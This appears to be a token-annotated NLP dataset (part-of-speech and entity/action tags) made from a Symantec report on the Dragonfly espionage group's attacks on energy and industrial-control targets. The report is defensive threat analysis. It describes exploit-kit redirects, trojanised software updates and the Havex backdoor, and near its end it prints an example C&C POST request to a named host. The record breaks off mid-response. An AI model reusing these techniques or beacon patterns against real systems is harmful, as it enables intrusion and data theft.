A DT O O
cyberespionage NN O O
campaign NN O O
against IN O O
a DT O O
range NN O O
of IN O O
targets NNS O O
, , O O
mainly RB O O
in IN O O
the DT O O
energy NN O O
sector NN O O
, , O O
gave VBD O O
attackers NNS O O
the DT O O
ability NN O O
to TO O O
mount VB O O
sabotage NN O O
operations NNS O O
against IN O O
their PRP$ O O
victims NNS O O
. . O O

The DT O O
attackers NNS O O
, , O O
known VBN O O
to IN O O
Symantec NNP O O
as IN O O
Dragonfly NNP O O
, , O O
managed VBD O O
to TO O O
compromise VB O O
a DT O O
number NN O O
of IN O O
strategically RB O O
important JJ O O
organizations NNS O O
for IN O O
spying VBG O O
purposes NNS O O
and CC O O
, , O O
if IN O O
they PRP O O
had VBD O O
used VBN O O
the DT O O
sabotage NN O O
capabilities NNS O O
open JJ O O
to IN O O
them PRP O O
, , O O
could MD O O
have VB O O
caused VBN O O
damage NN O O
or CC O O
disruption NN O O
to IN O O
the DT O O
energy NN O O
supply NN O O
in IN O O
the DT O O
affected JJ O O
countries NNS O O
. . O O

The DT O O
Dragonfly NNP O O
group NN O O
, , O O
which WDT O O
is VBZ O O
also RB O O
known VBN O O
by IN O O
other JJ O O
vendors NNS O O
as IN O O
Energetic NNP O O
Bear NNP O O
, , O O
are VBP O O
a DT O O
capable JJ O O
group NN O O
who WP O O
are VBP O O
evolving VBG O O
over IN O O
time NN O O
and CC O O
targeting VBG O O
primarily RB O O
the DT O O
energy NN O O
sector NN O O
and CC O O
related VBN O O
industries NNS O O
. . O O

They PRP O O
have VBP O O
been VBN O O
in IN O O
operation NN O O
since IN O O
at RB O O
least RBS O O
2011 CD O O
but CC O O
may MD O O
have VB O O
been VBN O O
active JJ O O
even RB O O
longer RBR O O
than IN O O
that DT O O
. . O O

Dragonfly NNP O O
initially RB O O
targeted VBD O O
defense NN O O
and CC O O
aviation NN O O
companies NNS O O
in IN O O
the DT O O
US NNP O O
and CC O O
Canada NNP O O
before IN O O
shifting VBG O O
its PRP$ O O
focus NN O O
to IN O O
US NNP O O
and CC O O
European JJ O O
energy NN O O
firms NNS O O
in IN O O
early JJ O O
2013 CD O O
. . O O

More RBR O O
recent JJ O O
targets NNS O O
have VBP O O
included VBN O O
companies NNS O O
related JJ O O
to IN O O
industrial JJ O O
control NN O O
systems NNS O O
. . O O

Dragonfly NNP O O
has VBZ O O
used VBN O O
spam NN O O
email NN O O
campaigns NNS O O
and CC O O
watering VBG O O
hole NN O O
attacks NNS O O
to TO O O
infect VB O O
targeted VBN O O
organizations NNS O O
. . O O

The DT O O
group NN O O
has VBZ O O
used VBN O O
two CD O O
main JJ O O
malware NN O O
tools NNS O O
: : O O
Trojan NNP O O
. . O O
Karagany NNP O O
and CC O O
Backdoor NNP O O
. . O O
Oldrea NNP O O
. . O O

The DT O O
latter NN O O
appears VBZ O O
to TO O O
be VB O O
a DT O O
custom NN O O
piece NN O O
of IN O O
malware NN O O
, , O O
either RB O O
written VBN O O
by IN O O
or CC O O
for IN O O
the DT O O
attackers NNS O O
. . O O

Symantec NNP O O
observed VBD O O
spear NN O O
phishing VBG O O
attempts NNS O O
in IN O O
the DT O O
form NN O O
of IN O O
emails NNS O O
with IN O O
PDF NNP O O
attachments NNS O O
from IN O O
February NNP O O
2013 CD O O
to IN O O
June NNP O O
2013 CD O O
. . O O

The DT O O
email NN O O
topics NNS O O
were VBD O O
related VBN O O
to IN O O
office NN O O
administration NN O O
issues NNS O O
such JJ O O
as IN O O
dealing VBG O O
with IN O O
an DT O O
account NN O O
or CC O O
problems NNS O O
with IN O O
a DT O O
delivery NN O O
. . O O

Identified JJ O O
targets NNS O O
of IN O O
this DT O O
campaign NN O O
were VBD O O
mainly RB O O
US NNP O O
and CC O O
UK NNP O O
organizations NNS O O
within IN O O
the DT O O
energy NN O O
sector NN O O
. . O O

In IN O O
May NNP O O
2013 CD O O
, , O O
the DT O O
attackers NNS O O
began VBD O O
to TO O O
use VB O O
the DT O O
Lightsout NNP O O
exploit VBP O O
kit NN O O
as IN O O
an DT O O
attack NN O O
vector NN O O
, , O O
redirecting VBG O O
targets NNS O O
from IN O O
various JJ O O
websites NNS O O
. . O O

The DT O O
use NN O O
of IN O O
the DT O O
Lightsout NNP O O
exploit NN O O
kit NN O O
has VBZ O O
continued VBN O O
to IN O O
date NN O O
, , O O
albeit RB O O
intermittently RB O O
. . O O

The DT O O
exploit NN O O
kit NN O O
has VBZ O O
been VBN O O
upgraded VBN O O
over IN O O
time NN O O
with IN O O
obfuscation NN O O
techniques NNS O O
. . O O

The DT O O
updated VBN O O
version NN O O
of IN O O
Lightsout NNP O O
became VBD O O
known VBN O O
as IN O O
the DT O O
Hello UH O O
exploit VB O O
kit NN O O
. . O O

A DT O O
newer JJR O O
approach NN O O
used VBN O O
by IN O O
the DT B-Entity 1
attackers NNS I-Entity O
involves VBZ O O
compromising VBG B-Action 2
the DT O O
update NN B-Entity 3
site NN I-Entity O
for IN I-Entity O
several JJ I-Entity O
industrial JJ I-Entity O
control NN I-Entity O
system NN I-Entity O
( -LRB- I-Entity O
ICS NNP I-Entity O
) -RRB- I-Entity O
software NN I-Entity O
producers NNS I-Entity O
. . O O

They PRP B-Entity 1
then RB O O
bundle NN B-Action 2
Backdoor NNP O O
. . B-Entity 3
Oldrea NNP I-Entity O
with IN B-Modifier 4
a DT O O
legitimate JJ B-Entity 5
update NN I-Entity O
of IN I-Entity O
the DT I-Entity O
affected JJ I-Entity O
software NN I-Entity O
. . O O

To IN O O
date NN O O
, , O O
three CD O O
ICS NNP O O
software NN O O
producers NNS O O
are VBP O O
known VBN O O
to TO O O
have VB O O
been VBN O O
compromised VBN O O
. . O O

The DT O O
Dragonfly NNP B-Entity 1
attackers NNS I-Entity O
used VBD B-Action 2
hacked VBD O O
websites NNS B-Entity 3
to IN B-Modifier 4
host NN O O
command NN B-Entity 5
- HYPH I-Entity O
and CC I-Entity O
- HYPH I-Entity O
control NN I-Entity O
( -LRB- I-Entity O
C&C NNP I-Entity O
) -RRB- I-Entity O
software NN I-Entity O
. . O O

Compromised VBN O O
websites NNS O O
appear VBP O O
to TO O O
consistently RB O O
use VB O O
some DT O O
form NN O O
of IN O O
content NN O O
management NN O O
system NN O O
. . O O

The DT O O
current JJ O O
targets NNS O O
of IN O O
the DT O O
Dragonfly NNP O O
group NN O O
, , O O
based VBN O O
on IN O O
compromised VBN O O
websites NNS O O
and CC O O
hijacked VBN O O
software NN O O
updates NNS O O
, , O O
are VBP O O
the DT O O
energy NN O O
sector NN O O
and CC O O
industrial JJ O O
control NN O O
systems NNS O O
, , O O
particularly RB O O
those DT O O
based VBN O O
in IN O O
Europe NNP O O
. . O O

While IN O O
the DT O O
majority NN O O
of IN O O
victims NNS O O
are VBP O O
located VBN O O
in IN O O
the DT O O
US NNP O O
, , O O
these DT O O
appear VBP O O
to TO O O
mostly RB O O
be VB O O
collateral JJ O O
damage NN O O
. . O O

That DT O O
is RB O O
, , O O
many JJ O O
of IN O O
these DT O O
computers NNS O O
were VBD O O
likely RB O O
infected VBN O O
either CC O O
through IN O O
watering VBG O O
hole NN O O
attacks NNS O O
or CC O O
update VB O O
hijacks NNS O O
and CC O O
are VBP O O
of IN O O
no DT O O
interest NN O O
to IN O O
the DT O O
attacker NN O O
. . O O

By IN O O
examining VBG O O
victims NNS O O
with IN O O
active JJ O O
infections NNS O O
– : O O
where WRB O O
additional JJ O O
malicious JJ O O
activity NN O O
has VBZ O O
been VBN O O
detected VBN O O
– NFP O O
it PRP O O
is VBZ O O
possible JJ O O
to TO O O
gather VB O O
a DT O O
more RBR O O
accurate JJ O O
picture NN O O
of IN O O
' `` O O
true JJ O O
' '' O O
victims NNS O O
. . O O

The DT O O
most RBS O O
active JJ O O
infections NNS O O
, , O O
as IN O O
in IN O O
Figure NN O O
2 CD O O
, , O O
are VBP O O
in IN O O
Spain NNP O O
, , O O
followed VBN O O
in IN O O
order NN O O
by IN O O
the DT O O
US NNP O O
, , O O
France NNP O O
, , O O
Italy NNP O O
, , O O
and CC O O
Germany NNP O O
. . O O

Dragonfly NN O O
uses VBZ O O
two CD O O
main JJ O O
pieces NNS O O
of IN O O
malware NN O O
in IN O O
its PRP$ O O
attacks NNS O O
. . O O

Both DT O O
are VBP O O
Remote NNP B-Entity 1
Access NNP I-Entity O
Tool NNP I-Entity O
( -LRB- I-Entity O
RAT NNP I-Entity O
) -RRB- I-Entity O
type NN I-Entity O
malware NN I-Entity O
which WDT O O
provide VB B-Action 2
the DT O O
attackers NNS B-Entity 3
with IN B-Modifier 4
access NN O O
and CC B-Entity 5
control NN I-Entity O
of IN I-Entity O
compromised VBN I-Entity O
computers NNS I-Entity O
. . O O

Dragonfly NNP O O
's POS O O
favored VBN O O
malware NN O O
tool NN O O
is VBZ O O
Backdoor NNP O O
. . O O
Oldrea NNP O O
, , O O
which WDT O O
is VBZ O O
also RB O O
known VBN O O
as IN O O
Havex NNP O O
or CC O O
the DT O O
Energetic NNP O O
Bear NNP O O
RAT NNP O O
. . O O

Oldrea JJ O O
acts VBZ O O
as IN O O
a DT O O
back JJ O O
door NN O O
for IN O O
the DT O O
attackers NNS O O
on IN O O
to IN O O
the DT O O
victim NN O O
's POS O O
computer NN O O
, , O O
allowing VBG O O
them PRP O O
to IN O O
extract VB B-Action 1
data NNS B-Entity 2
and CC O O
install VB B-Action 3
further RB O O
malware VBP B-Entity 4
. . O O

Oldrea NN O O
appears VBZ O O
to TO O O
be VB O O
custom RB O O
malware NN O O
, , O O
either RB O O
written VBN O O
by IN O O
the DT O O
group NN O O
itself PRP O O
or CC O O
created VBN O O
for IN O O
it PRP O O
. . O O

This DT O O
provides VBZ O O
some DT O O
indication NN O O
of IN O O
the DT O O
capabilities NNS O O
and CC O O
resources NNS O O
behind IN O O
the DT O O
Dragonfly NNP O O
group NN O O
. . O O

The DT O O
second JJ O O
main JJ O O
tool NN O O
used VBN O O
by IN O O
Dragonfly NNP O O
is VBZ O O
Trojan NNP O O
. . O O
Karagany NNP O O
. . O O

Unlike IN O O
Oldrea NNP O O
, , O O
Karagany NNP O O
was VBD O O
available JJ O O
on IN O O
the DT O O
underground JJ O O
market NN O O
. . O O

The DT O O
source NN O O
code NN O O
for IN O O
version NN O O
1 CD O O
of IN O O
Karagany NNP O O
was VBD O O
leaked VBN O O
in IN O O
2010 CD O O
. . O O

Symantec NNP O O
believes VBZ O O
that DT O O
Dragonfly NNP O O
may MD O O
have VB O O
taken VBN O O
this DT O O
source NN O O
code NN O O
and CC O O
modified VBN O O
for IN O O
its PRP$ O O
own JJ O O
use NN O O
. . O O

Symantec NNP O O
found VBD O O
that IN O O
the DT O O
majority NN O O
of IN O O
computers NNS O O
compromised VBN O O
by IN O O
the DT O O
attackers NNS O O
were VBD O O
infected VBN O O
with IN O O
Oldrea NNP O O
. . O O

Karagany NNP O O
was VBD O O
only RB O O
used VBN O O
in IN O O
around RB O O
5 CD O O
percent NN O O
of IN O O
infections NNS O O
. . O O

The DT O O
two CD O O
pieces NNS O O
of IN O O
malware NN O O
are VBP O O
similar JJ O O
in IN O O
functionality NN O O
and CC O O
what WP O O
prompts VBZ O O
the DT O O
attackers NNS O O
to TO O O
choose VB O O
one CD O O
tool NN O O
over IN O O
another DT O O
remains VBZ O O
unknown JJ O O
. . O O

The DT O O
Dragonfly NNP O O
group NN O O
has VBZ O O
used VBN O O
at IN O O
least JJS O O
three CD O O
infection NN O O
tactics NNS O O
against IN O O
targets NNS O O
in IN O O
the DT O O
energy NN O O
sector NN O O
. . O O

The DT O O
earliest JJS O O
method NN O O
was VBD O O
an DT O O
email NN O O
spear NN O O
phishing VBG O O
campaign NN O O
, , O O
which WDT O O
saw VBD O O
selected VBN B-Entity 1
executives NNS I-Entity O
and CC I-Entity O
senior JJ I-Entity O
employees NNS I-Entity O
in IN I-Entity O
target NN I-Entity O
companies NNS I-Entity O
receive VBP B-Action 2
emails NNS O O
containing VBG B-Entity 3
a DT I-Entity O
malicious JJ I-Entity O
PDF NNP I-Entity O
attachment NN I-Entity O
. . O O

Infected VBN O O
emails NNS O O
had VBD O O
one CD O O
of IN O O
two CD O O
subject JJ O O
lines NNS O O
: : O O
" `` O O
The DT O O
account NN O O
" '' O O
or CC O O
" `` O O
Settlement NNP O O
of IN O O
delivery NN O O
problem NN O O
" '' O O
. . O O

All DT O O
of IN O O
the DT O O
emails NNS O O
were VBD O O
from IN O O
a DT O O
single JJ O O
Gmail NNP O O
address NN O O
. . O O

Figure NN O O
3 CD O O
displays VBZ O O
the DT O O
number NN O O
of IN O O
different JJ O O
recipients NNS O O
per IN O O
day NN O O
. . O O

The DT O O
spam NN O O
campaign NN O O
began VBD O O
in IN O O
February NNP O O
2013 CD O O
and CC O O
continued VBN O O
into IN O O
June NNP O O
2013 CD O O
. . O O

Symantec NNP O O
identified VBD O O
seven CD O O
different JJ O O
organizations NNS O O
targeted VBN O O
in IN O O
this DT O O
campaign NN O O
. . O O

At RB O O
least RBS O O
one CD O O
organization NN O O
was VBD O O
attacked VBN O O
intermittently RB O O
for IN O O
a DT O O
period NN O O
of IN O O
84 CD O O
days NNS O O
. . O O

In IN O O
June NNP O O
2013 CD O O
, , O O
the DT O O
attackers NNS O O
shifted VBD O O
their PRP$ O O
focus NN O O
to IN O O
watering VBG O O
hole NN O O
attacks NNS O O
. . O O

They PRP O O
compromised VBD O O
a DT O O
number NN O O
of IN O O
energy- NN O O
related VBN O O
websites NNS O O
and CC O O
injected VBD O O
an DT O O
iframe NN O O
into IN O O
each DT O O
of IN O O
them PRP O O
. . O O

This DT O O
iframe NN O O
then RB O O
redirected VBD O O
visitors NNS O O
to IN O O
another DT O O
compromised VBN O O
legitimate JJ O O
website NN O O
hosting VBG O O
the DT O O
Lightsout NNP O O
exploit VBP O O
kit NN O O
. . O O

This DT O O
in IN O O
turn NN O O
exploited VBD O O
either CC O O
Java NNP O O
or CC O O
Internet NNP O O
Explorer NNP O O
in IN O O
order NN O O
to TO O O
drop VB B-Action 1
Oldrea NNP O O
or CC B-Entity 2
Karagany NNP I-Entity O
on IN B-Modifier 3
the DT O O
victim NN B-Entity 4
's POS I-Entity O
computer NN I-Entity O
. . O O

The DT O O
fact NN O O
that IN O O
the DT O O
attackers NNS O O
compromised VBD O O
multiple JJ O O
legitimate JJ O O
websites NNS O O
for IN O O
each DT O O
stage NN O O
of IN O O
the DT O O
operation NN O O
is VBZ O O
further JJ O O
evidence NN O O
that IN O O
the DT O O
group NN O O
has VBZ O O
strong JJ O O
technical JJ O O
capabilities NNS O O
. . O O

In IN O O
September NNP O O
2013 CD O O
, , O O
Dragonfly NNP O O
began VBD O O
using VBG O O
a DT O O
new JJ O O
version NN O O
of IN O O
this DT O O
exploit NN O O
kit NN O O
, , O O
known VBN O O
as IN O O
the DT O O
Hello UH O O
exploit VB O O
kit NN O O
. . O O

The DT O O
landing NN O O
page NN O O
for IN O O
this DT O O
kit NN O O
contains VBZ O O
JavaScript NNP O O
which WDT O O
fingerprints VBZ O O
the DT O O
system NN O O
, , O O
identifying VBG O O
installed VBN O O
browser NN O O
plugins NNS O O
. . O O

The DT O O
victim NN O O
is VBZ O O
then RB O O
redirected VBN O O
to IN O O
a DT O O
URL NN O O
which WDT O O
in IN O O
turn NN O O
determines VBZ O O
the DT O O
best JJS O O
exploit NN O O
to TO O O
use VB O O
based VBN O O
on IN O O
the DT O O
information NN O O
collected VBD O O
. . O O

Figure NN O O
4 CD O O
shows VBZ O O
the DT O O
compromised VBN O O
websites NNS O O
categorized VBN O O
into IN O O
their PRP$ O O
respective JJ O O
industries NNS O O
. . O O

Fifty CD O O
percent NN O O
of IN O O
identified VBN O O
targets NNS O O
were VBD O O
energy NN O O
industry NN O O
related VBN O O
and CC O O
thirty CD O O
percent NN O O
were VBD O O
energy NN O O
control NN O O
systems NNS O O
, , O O
as IN O O
shown VBN O O
in IN O O
Figure NN O O
4 CD O O
. . O O

A DT O O
clear JJ O O
shift NN O O
in IN O O
the DT O O
attackers NNS O O
targeting VBG O O
can MD O O
be VB O O
seen VBN O O
in IN O O
March NNP O O
2014 CD O O
when WRB O O
energy NN O O
control NN O O
systems NNS O O
become VB O O
the DT O O
primary JJ O O
target NN O O
. . O O

The DT O O
most RBS O O
ambitious JJ O O
attack NN O O
vector NN O O
used VBN O O
by IN O O
Dragonfly NNP O O
was VBD O O
the DT O O
compromise NN O O
of IN O O
a DT O O
number NN O O
of IN O O
legitimate JJ O O
software NN O O
packages NNS O O
. . O O

Three CD O O
different JJ O O
ICS NN O O
equipment NN O O
providers NNS O O
were VBD O O
targeted VBN O O
and CC O O
malware NN O O
was VBD O O
inserted VBN O O
into IN O O
the DT O O
software NN O O
bundles NNS O O
they PRP O O
had VBD O O
made VBN O O
available JJ O O
for IN O O
download NN O O
on IN O O
their PRP$ O O
websites NNS O O
. . O O

Analysis NN O O
of IN O O
the DT O O
compilation NN O O
timestamps NNS O O
on IN O O
the DT O O
malware NN O O
used VBN O O
by IN O O
the DT O O
attackers NNS O O
indicate VBP O O
that IN O O
the DT O O
group NN O O
mostly RB O O
worked VBD O O
between IN O O
Monday NNP O O
and CC O O
Friday NNP O O
, , O O
with IN O O
activity NN O O
mainly RB O O
concentrated VBD O O
in IN O O
a DT O O
nine CD O O
- HYPH O O
hour NN O O
period NN O O
that WDT O O
corresponded VBD O O
to IN O O
a DT O O
9 CD O O
am NN O O
to IN O O
6 CD O O
pm NN O O
working VBG O O
day NN O O
in IN O O
the DT O O
UTC NNP O O
+ SYM O O
4 CD O O
time NN O O
zone NN O O
. . O O

The DT O O
Dragonfly NNP O O
group NN O O
is VBZ O O
technically RB O O
adept JJ O O
and CC O O
able JJ O O
to TO O O
think VB O O
strategically RB O O
. . O O

Given VBN O O
the DT O O
size NN O O
of IN O O
some DT O O
of IN O O
its PRP$ O O
targets NNS O O
, , O O
the DT O O
group NN O O
found VBD O O
a DT O O
" `` O O
soft JJ O O
underbelly RB O O
" '' O O
by IN O O
compromising VBG O O
their PRP$ O O
suppliers NNS O O
, , O O
which WDT O O
are VBP O O
invariably RB O O
smaller JJR O O
, , O O
less RBR O O
protected JJ O O
companies NNS O O
. . O O

Identification NN O O
of IN O O
this DT O O
group NN O O
is VBZ O O
based VBN O O
on IN O O
the DT O O
use NN O O
of IN O O
two CD O O
malware NN O O
families NNS O O
and CC O O
an DT O O
exploit NN O O
kit NN O O
. . O O

The DT O O
malware NN O O
families NNS O O
utilized VBN O O
are VBP O O
Backdoor NNP O O
. . O O
Oldrea NNP O O
and CC O O
Trojan NNP O O
. . O O
Karagany NNP O O
. . O O

The DT O O
exploit NN O O
kit NN O O
is VBZ O O
known VBN O O
as IN O O
Lightsout NNP O O
and/or CC O O
Hello UH O O
. . O O

Hello UH O O
is VBZ O O
an DT O O
updated VBN O O
iteration NN O O
of IN O O
Lightsout NNP O O
that IN O O
the DT O O
Dragonfly NNP O O
group NN O O
began VBD O O
to TO O O
use VB O O
in IN O O
September NNP O O
2013 CD O O
. . O O

Use NNP O O
of IN O O
Backdoor NNP O O
. . O O
Oldrea NN O O
appears VBZ O O
to TO O O
be VB O O
limited VBN O O
to IN O O
the DT O O
Dragonfly NNP O O
group NN O O
. . O O

In IN O O
addition NN O O
, , O O
specific JJ O O
instances NNS O O
of IN O O
Trojan NNP O O
. . O O

Karagany NNP O O
have VBP O O
been VBN O O
used VBN O O
by IN O O
this DT O O
group NN O O
. . O O

Karagany NNP O O
is VBZ O O
a DT O O
Russian JJ O O
RAT NNP O O
sold VBD O O
on IN O O
underground JJ O O
forums NNS O O
. . O O

Instances NNS O O
of IN O O
this DT O O
malware NN O O
related VBN O O
to IN O O
the DT O O
Dragonfly NNP O O
group NN O O
are VBP O O
identified VBN O O
based VBN O O
on IN O O
them PRP O O
being VBG O O
delivered VBN O O
through IN O O
the DT O O
Lightsout NNP O O
exploit VBP O O
kit NN O O
and CC O O
also RB O O
a DT O O
particular JJ O O
packer NN O O
that IN O O
this DT O O
group NN O O
used VBD O O
. . O O

Symantec NNP O O
detects VBZ O O
the DT O O
Trojan NNP O O
. . O O
Karagany NNP O O
packer NN O O
used VBN O O
by IN O O
this DT O O
group NN O O
as IN O O
Trojan NNP O O
. . O O
Karagany!gen1 NNS O O
. . O O

The DT O O
Lightsout NNP O O
exploit VBP O O
kit NN O O
is VBZ O O
a DT O O
simple JJ O O
exploit NN O O
kit NN O O
that WDT O O
is VBZ O O
consistently RB O O
used VBN O O
to TO O O
deliver VB O O
primarily RB O O
Backdoor NNP O O
. . O O
Oldrea NNP O O
and CC O O
, , O O
in IN O O
several JJ O O
instances NNS O O
, , O O
Trojan NNP O O
. . O O
Karagany NNP O O
. . O O

A DT O O
number NN O O
of IN O O
sites NNS O O
that WDT O O
use VBP O O
content NN O O
management NN O O
systems NNS O O
were VBD O O
exploited VBN O O
and CC O O
an DT O O
iframe NN O O
was VBD O O
used VBN O O
in IN O O
order NN O O
to TO O O
redirect VB O O
visitors NNS O O
to IN O O
sites NNS O O
hosting VBG O O
the DT O O
Lightsout NNP O O
exploit VBP O O
kit NN O O
. . O O

An DT O O
example NN O O
of IN O O
an DT O O
injected VBN O O
iframe NN O O
can MD O O
be VB O O
seen VBN O O
in IN O O
figure NN O O
7 CD O O
. . O O

The DT O O
exploit JJ O O
kit NN O O
uses VBZ O O
browser NN O O
( -LRB- O O
e.g. FW O O

Internet NN O O
Explorer NN O O
and CC O O
Firefox NNP O O
) -RRB- O O
and CC O O
Java NNP O O
exploits NNS O O
in IN O O
order NN O O
to TO O O
deliver VB O O
either RB O O
Backdoor NNP O O
. . O O
Oldrea NNP O O
or CC O O
Trojan NNP O O
. . O O
Karagany NNP O O
. . O O

An DT O O
example NN O O
of IN O O
the DT O O
structure NN O O
of IN O O
the DT O O
Lightsout NNP O O
exploit NN O O
kit NN O O
can MD O O
be VB O O
seen VBN O O
Table NNP O O
1 CD O O
. . O O

Note VB O O
that DT O O
file NN O O
names NNS O O
and CC O O
exploits NNS O O
used VBN O O
may MD O O
vary VB O O
. . O O

In IN O O
September NNP O O
2013 CD O O
, , O O
the DT O O
Dragonfly NNP O O
group NN O O
began VBD O O
using VBG O O
a DT O O
new JJ O O
version NN O O
of IN O O
Lightsout NNP O O
, , O O
also RB O O
known VBN O O
as IN O O
the DT O O
Hello UH O O
exploit VB O O
kit NN O O
. . O O

The DT O O
JavaScript NNP O O
included VBD O O
in IN O O
the DT O O
landing NN O O
page NN O O
redirects VBZ O O
the DT O O
browser NN O O
to IN O O
a DT O O
URL NN O O
that WDT O O
depends VBZ O O
on IN O O
the DT O O
fonts NNS O O
installed VBN O O
on IN O O
the DT O O
system NN O O
, , O O
browser NN O O
add VB O O
- HYPH O O
ons NNS O O
, , O O
the DT O O
OS NNP O O
version NN O O
, , O O
and CC O O
the DT O O
user NN O O
agent NN O O
. . O O

At IN O O
this DT O O
point NN O O
, , O O
it PRP O O
determines VBZ O O
the DT O O
best JJS O O
exploit NN O O
to TO O O
use VB O O
, , O O
based VBN O O
on IN O O
the DT O O
information NN O O
provided VBN O O
, , O O
and CC O O
generates VBZ O O
an DT O O
appropriate JJ O O
URL NN O O
to TO O O
redirect VB O O
the DT O O
user NN O O
to IN O O
the DT O O
appropriate JJ O O
exploit NN O O
/ SYM O O
payload NN O O
. . O O

The DT O O
following NN O O
shows VBZ O O
an DT O O
example NN O O
of IN O O
such PDT O O
a DT O O
request NN O O
: : O O
[ -LRB- O O
http://]compromised.example ADD O O
/ SYM O O
wp RB O O
- HYPH O O
includes VBZ O O
/ SYM O O
pomo/ RB O O
dtsrc.php?a=[EK NN O O
_ NFP O O
DETERMINED NNP O O
_ NFP O O
PARAMETER NNP O O
] -RRB- O O
[ -LRB- O O
EK_DETERMINED_PARAMETER NN O O
] -RRB- O O
may MD O O
be VB O O
anything NN O O
listed VBN O O
in IN O O
Table NNP O O
2 CD O O
. . O O

The DT O O
parameters NNS O O
dwe VBP O O
and CC O O
dwd VBP O O
relate VB O O
to TO O O
which WDT O O
payload NN O O
is VBZ O O
requested VBN O O
for IN O O
download NN O O
, , O O
for IN O O
example NN O O
: : O O
The DT O O
values NNS O O
of IN O O
the DT O O
[ -LRB- O O
EK_DETERMINED_PARAMETER NN O O
] -RRB- O O
variable NN O O
may MD O O
relate VB O O
to IN O O
the DT O O
two CD O O
different JJ O O
file NN O O
types NNS O O
represented VBN O O
by IN O O
Backdoor NNP O O
. . O O
Oldrea NNP O O
and CC O O
Trojan NNP O O
. . O O

Karagany!gen1 JJ O O
payloads NNS O O
. . O O

Oldrea JJ O O
payloads NNS O O
are VBP O O
DLL NNP O O
files NNS O O
( -LRB- O O
URLs NNS O O
end NN O O
in IN O O
" `` O O
d NN O O
" '' O O
for IN O O
DLL NNP O O
? . O O
) -RRB- O O
while IN O O
Karagany!gen1 NNP O O
payloads NNS O O
are VBP O O
portable JJ O O
executables NNS O O
( -LRB- O O
URLs NNS O O
end NN O O
in IN O O
" `` O O
e NN O O
" '' O O
for IN O O
EXE NNP O O
? . O O
) -RRB- O O
. . O O

At IN O O
the DT O O
core NN O O
of IN O O
Backdoor NNP O O
. . O O
Oldrea NNP O O
is VBZ O O
a DT B-Entity 1
persistent JJ I-Entity O
component NN I-Entity O
that IN O O
interacts VBZ B-Action 2
with IN B-Modifier 3
C&C NNP O O
servers NNS B-Entity 4
to IN O O
download NN B-Action 5
and CC O O
execute VB B-Action 6
payloads NNS B-Entity 7
. . O O

The DT O O
components NNS B-Entity 1
are VBP O O
downloaded VBN B-Action 2
by IN O O
reaching VBG B-Action 3
out RP I-Action O
to IN B-Modifier 4
the DT O O
C&C NNP B-Entity 5
server NN I-Entity O
and CC O O
performing VBG B-Action 6
a DT O O
GET NNP B-Entity 7
request NN I-Entity O
which WDT O O
returns VBZ O O
an DT O O
HTML NN O O
page NN O O
containing VBG O O
a DT O O
base64 CD O O
encoded VBN O O
string NN O O
between IN O O
two CD O O
comments NNS O O
marked VBN O O
with IN O O
the DT O O
' `` O O
havex NN O O
' '' O O
string NN O O
. . O O

In IN O O
this DT O O
specific JJ O O
example NN O O
, , O O
the DT O O
' `` O O
038 CD O O
' '' O O
in IN O O
the DT O O
file NN O O
name NN O O
indicates VBZ O O
the DT O O
major JJ O O
version NN O O
number NN O O
. . O O

Post NNP O O
infection NN O O
, , O O
Backdoor NNP B-Entity 1
. . I-Entity O
Oldrea NNP I-Entity O
will MD O O
attempt VB O O
to TO O O
collect VB B-Action 2
system NN O O
information NN B-Entity 3
such JJ O O
as IN B-Modifier 4
OS NNP O O
, , B-Entity 5
user NN I-Entity O
name NN I-Entity O
, , I-Entity O
computer NN I-Entity O
name NN I-Entity O
, , I-Entity O
country NN I-Entity O
, , I-Entity O
language NN I-Entity O
, , I-Entity O
nation NN I-Entity O
, , I-Entity O
Internet NN I-Entity O
adapter NN I-Entity O
configuration NN I-Entity O
information NN I-Entity O
, , I-Entity O
available JJ I-Entity O
drives NNS I-Entity O
, , I-Entity O
default NN I-Entity O
browser NN I-Entity O
, , I-Entity O
running VBG I-Entity O
processes NNS I-Entity O
, , I-Entity O
desktop JJ I-Entity O
file NN I-Entity O
list NN I-Entity O
, , I-Entity O
My PRP$ I-Entity O
Documents NNS I-Entity O
, , I-Entity O
Internet NN I-Entity O
history NN I-Entity O
, , I-Entity O
program NN I-Entity O
files NNS I-Entity O
, , I-Entity O
and CC I-Entity O
root NN I-Entity O
of IN I-Entity O
available JJ I-Entity O
drives NNS I-Entity O
. . O O

It PRP O O
also RB O O
collects VBZ O O
data NNS O O
from IN O O
Outlook NNP O O
( -LRB- O O
address NN O O
book NN O O
) -RRB- O O
and CC O O
ICS NNP O O
related JJ O O
software NN O O
configuration NN O O
files NNS O O
. . O O

This DT O O
data NN B-Entity 1
is VBZ O O
collected VBD B-Action 2
and CC O O
written VBN B-Action 3
to IN B-Modifier 4
a DT O O
temporary JJ B-Entity 5
file NN I-Entity O
in IN B-Modifier 6
an DT O O
encrypted VBN B-Entity 7
form NN I-Entity O
before IN O O
it PRP B-Entity 8
is VBZ O O
POST'ed NNP B-Action 9
to IN B-Modifier 10
a DT O O
remote JJ B-Entity 11
C&C NNP I-Entity O
server NN I-Entity O
. . O O

The DT O O
following VBG O O
are VBP O O
examples NNS O O
of IN O O
a DT O O
POST NNP O O
request NN O O
and CC O O
a DT O O
POST NNP O O
response NN O O
. . O O

POST NNP O O
request VBP O O
example NN O O
: : O O
POST NNP O O
/wp08/wp NNP O O
- HYPH O O
includes VBZ O O
/ HYPH O O
dtcla.php?id=285745296322896178920098FD80 RB O O
- HYPH O O
20&v1=038&v2=17 CD O O
0393861&q=5265882854508EFCF958F979E4 CD O O
HTTP/1.1 NNP O O
User NNP O O
- HYPH O O
Agent NNP O O
: : O O
Mozilla/5.0 NNP O O
( -LRB- O O
Windows NNP O O
; : O O
U PRP O O
; : O O
Windows NNP O O
NT NNP O O
6.1 CD O O
; : O O
en IN O O
- HYPH O O
US NNP O O
) -RRB- O O
AppleWebKit/525.19 NNP O O
( -LRB- O O
KHTML NNP O O
, , O O
like IN O O
Gecko NNP O O
) -RRB- O O
Chrome/1.0.154.36 NNP O O
Safari/525.19 NNP O O
Host NN O O
: : O O
toons.freesexycomics.com ADD O O
Content NN O O
- HYPH O O
Length NN O O
: : O O
0 CD O O
Cache NNP O O
- HYPH O O
Control NNP O O
: : O O
no DT O O
- HYPH O O
cache NN O O
POST NNP O O
response NN O O
example NN O O
: : O O
HTTP/1.1 $ O O
200 CD O O
OK JJ O O
Date NN O O
: : O O
We PRP O O
d MD O O
, , O O
22 CD O O
Jan NNP O O
2014 CD O O
13:40:48 CD O O
GMT NNP O O
Content NNP O O
- HYPH O O
Type NN O O
: : O O
text NN O O
/ , O O
html NN O O
Transfer NNP O O
